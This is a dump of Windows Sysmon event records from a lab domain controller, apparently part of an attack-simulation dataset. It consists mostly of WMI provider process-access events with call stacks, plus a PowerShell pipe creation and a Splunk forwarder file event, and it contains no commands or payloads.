16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7FAA-00000000AD01}10308C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7FAA-00000000AD01}10308C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002237304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.637{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544\PSHost.132591775724834264.11544.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E712A6AE6E5DA7D466C170670D2EC60,SHA256=588D945AF618046645C09A68C02633426963E813D9DD98F8978565376FA46132,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D64-603E-7FAA-00000000AD01}103085116C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 